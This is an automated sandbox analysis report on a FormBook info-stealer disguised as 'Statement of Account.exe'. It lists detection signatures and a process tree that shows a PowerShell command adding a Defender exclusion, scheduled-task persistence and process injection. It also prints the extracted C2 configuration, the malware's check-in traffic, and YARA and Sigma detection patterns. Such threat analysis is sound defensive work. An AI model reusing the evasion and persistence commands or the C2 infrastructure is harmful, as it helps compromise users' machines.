Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Statement of Account.exe

Overview

General Information

Sample name:Statement of Account.exe
Analysis ID:1543876
MD5:d034873f3ca1528cd660316e6bbe8c14
SHA1:bfd745b38033a3e3ee21be7876d053ea20cc46ef
SHA256:0248b7bdbf6c49ffceddae89725a94da2c3076ebbf6253fafd2c817b57dc5891
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Uses ipconfig to lookup or modify the Windows network settings
Uses netstat to query active network connections and open ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Statement of Account.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\Statement of Account.exe" MD5: D034873F3CA1528CD660316E6BBE8C14)
    • powershell.exe (PID: 1344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1260 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 3756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • NETSTAT.EXE (PID: 4608 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 2676 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • autochk.exe (PID: 2188 cmdline: "C:\Windows\SysWOW64\autochk.exe" MD5: FC398299F54290D5F35C69E865FD7CC2)
        • ipconfig.exe (PID: 7108 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • SIZfuXT.exe (PID: 4176 cmdline: C:\Users\user\AppData\Roaming\SIZfuXT.exe MD5: D034873F3CA1528CD660316E6BBE8C14)
    • schtasks.exe (PID: 7156 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 1780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.f6b-crxy.top/cu29/"], "decoy": ["qidr.shop", "usinessaviationconsulting.net", "68716329.xyz", "nd-los.net", "ealthironcladguarantee.shop", "oftware-download-69354.bond", "48372305.top", "omeownershub.top", "mall-chilli.top", "ajakgoid.online", "ire-changer-53482.bond", "rugsrx.shop", "oyang123.info", "azino-forum-pro.online", "817715.rest", "layman.vip", "eb777.club", "ovatonica.net", "urgaslotvip.website", "inn-paaaa.buzz", "reativedreams.design", "upremehomes.shop", "ames-saaab.buzz", "phonelock.xyz", "ideandseekvacations.xyz", "77179ksuhr.top", "ental-bridges-87553.bond", "7win2.bet", "ainan.company", "5mwhs.top", "hopp9.top", "65fhgejd3.xyz", "olandopaintingllc.online", "n-wee.buzz", "reshcasinoinfo2.top", "5734.party", "qtbyj.live", "gil.lat", "siabgc4d.online", "fios.top", "sed-cars-89003.bond", "nlineschools-2507-001-sap.click", "upiloffatemotors.online", "ordf.top", "achhonglan.shop", "irex.info", "oursmile.vip", "leachlondonstore.online", "asukacro.online", "panish-classes-64045.bond", "apita.top", "srtio.xyz", "kdsclci.bond", "ochacha.sbs", "oldsteps.buzz", "yzq0n.top", "npostl.xyz", "ladder-cancer-symptoms-mine.sbs", "400725iimfyuj120.top", "3589.photo", "rasilhojenoticias.online", "ependableequipment.online", "itusbandar126.info", "ohns.app"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 32 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.vbc.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          6.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          6.2.vbc.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18809:$sqlite3step: 68 34 1C 7B E1
          • 0x1891c:$sqlite3step: 68 34 1C 7B E1
          • 0x18838:$sqlite3text: 68 38 2A 90 C5
          • 0x1895d:$sqlite3text: 68 38 2A 90 C5
          • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", ProcessId: 1344, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", ProcessId: 1344, ProcessName: powershell.exe
          Sigma detected: Suspicious Add Scheduled Task Parent
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SIZfuXT.exe, ParentImage: C:\Users\user\AppData\Roaming\SIZfuXT.exe, ParentProcessId: 4176, ParentProcessName: SIZfuXT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp", ProcessId: 7156, ProcessName: schtasks.exe
          Sigma detected: Suspicious Schtasks From Env Var Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", ProcessId: 1260, ProcessName: schtasks.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe", ProcessId: 1344, ProcessName: powershell.exe

          Persistence and Installation Behavior

          barindex
          Sigma detected: Scheduled temp file as task from temp location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account.exe", ParentImage: C:\Users\user\Desktop\Statement of Account.exe, ParentProcessId: 6684, ParentProcessName: Statement of Account.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp", ProcessId: 1260, ProcessName: schtasks.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-28T15:35:40.784783+010020314531Malware Command and Control Activity Detected192.168.2.44998085.13.166.1880TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: Statement of Account.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeAvira: detection malicious, Label: TR/AD.Swotter.zvmla
          Found malware configuration
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.f6b-crxy.top/cu29/"], "decoy": ["qidr.shop", "usinessaviationconsulting.net", "68716329.xyz", "nd-los.net", "ealthironcladguarantee.shop", "oftware-download-69354.bond", "48372305.top", "omeownershub.top", "mall-chilli.top", "ajakgoid.online", "ire-changer-53482.bond", "rugsrx.shop", "oyang123.info", "azino-forum-pro.online", "817715.rest", "layman.vip", "eb777.club", "ovatonica.net", "urgaslotvip.website", "inn-paaaa.buzz", "reativedreams.design", "upremehomes.shop", "ames-saaab.buzz", "phonelock.xyz", "ideandseekvacations.xyz", "77179ksuhr.top", "ental-bridges-87553.bond", "7win2.bet", "ainan.company", "5mwhs.top", "hopp9.top", "65fhgejd3.xyz", "olandopaintingllc.online", "n-wee.buzz", "reshcasinoinfo2.top", "5734.party", "qtbyj.live", "gil.lat", "siabgc4d.online", "fios.top", "sed-cars-89003.bond", "nlineschools-2507-001-sap.click", "upiloffatemotors.online", "ordf.top", "achhonglan.shop", "irex.info", "oursmile.vip", "leachlondonstore.online", "asukacro.online", "panish-classes-64045.bond", "apita.top", "srtio.xyz", "kdsclci.bond", "ochacha.sbs", "oldsteps.buzz", "yzq0n.top", "npostl.xyz", "ladder-cancer-symptoms-mine.sbs", "400725iimfyuj120.top", "3589.photo", "rasilhojenoticias.online", "ependableequipment.online", "itusbandar126.info", "ohns.app"]}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeReversingLabs: Detection: 76%
          Multi AV Scanner detection for submitted file
          Source: Statement of Account.exeReversingLabs: Detection: 76%
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: Statement of Account.exeJoe Sandbox ML: detected
          Source: Statement of Account.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Statement of Account.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: ipconfig.pdb source: vbc.exe, 0000000C.00000002.1858338793.00000000052E7000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.1858179937.0000000005240000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861396265.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: explorer.exe, 00000007.00000002.4177672718.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4167058236.0000000003F7F000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4166685447.0000000003AF4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netstat.pdbGCTL source: vbc.exe, 00000006.00000002.1797607492.00000000057A0000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000006.00000002.1797670992.00000000057B7000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4164513188.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: vbc.exe, 0000000C.00000002.1858338793.00000000052E7000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.1858179937.0000000005240000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861396265.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.1797607492.00000000057A0000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000006.00000002.1797670992.00000000057B7000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4164513188.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1798892977.00000000035F1000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.000000000393E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1796711119.0000000003448000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.000000000318E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1857901352.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1859917399.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1798892977.00000000035F1000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.000000000393E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1796711119.0000000003448000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.000000000318E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1857901352.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1859917399.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: vbc.pdb source: explorer.exe, 00000007.00000002.4177672718.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4167058236.0000000003F7F000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4166685447.0000000003AF4000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop ebx6_2_00407B22

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49980 -> 85.13.166.18:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49980 -> 85.13.166.18:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49980 -> 85.13.166.18:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.f6b-crxy.top/cu29/
          Tries to resolve many domain names, but no domain seems valid
          Source: unknownDNS traffic detected: query: www.leachlondonstore.online replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.hopp9.top replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.kdsclci.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.eb777.club replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.nd-los.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.f6b-crxy.top replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.yzq0n.top replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.azino-forum-pro.online replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.sed-cars-89003.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.urgaslotvip.website replaycode: Name error (3)
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
          Source: global trafficHTTP traffic detected: GET /cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNT HTTP/1.1Host: www.irex.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: NMM-ASD-02742FriedersdorfHauptstrasse68DE NMM-ASD-02742FriedersdorfHauptstrasse68DE
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
